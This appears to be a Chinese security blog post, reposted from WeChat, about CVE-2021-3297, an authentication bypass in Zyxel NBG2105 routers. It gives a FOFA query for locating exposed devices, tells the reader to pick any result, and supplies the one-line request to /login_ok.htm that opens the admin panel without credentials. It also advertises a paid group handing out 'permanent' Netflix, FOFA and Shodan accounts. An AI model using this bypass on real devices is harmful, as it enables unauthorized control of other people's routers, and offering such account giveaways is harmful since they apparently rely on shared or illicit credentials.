fofa语句:
app="ZyXEL-NBG2105"
我们随便点一个进入
接着使用POC
GET /login_ok.htmHost:xxx.xxx.xxx.xxxcookie:login=1
直接进入后台
参考链接:
https://mp.weixin.qq.com/s/7zOUGx88R7Sfvc3M1CzygA
实际上经过多次测试,并不需要修改cookie里的login=0
直接访问login_ok.htm,即可直接跳转到后台首页
脚本已经有师傅写好,放在星球了
最近有师傅说如果奈飞Netflix账号用完还有再送吗,从现在起将分享永久奈飞Netflix账号,账号过期了将重新发放新的账号!
bgbing星球:渗透测试,内网渗透,SRC漏洞分享,安全开发,安全武器库
(加入星球,送fofa永久会员,送永久奈飞Netflix账号,送shodan永久会员,送xray高级版)
看了一下,优惠券剩下不到十张,希望师傅们支持支持啦🐟
当然也可以通过下面方式进入
原文始发于微信公众号(bgbing安全):(CVE-2021-3297)Zyxel NBG2105 身份验证绕过
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论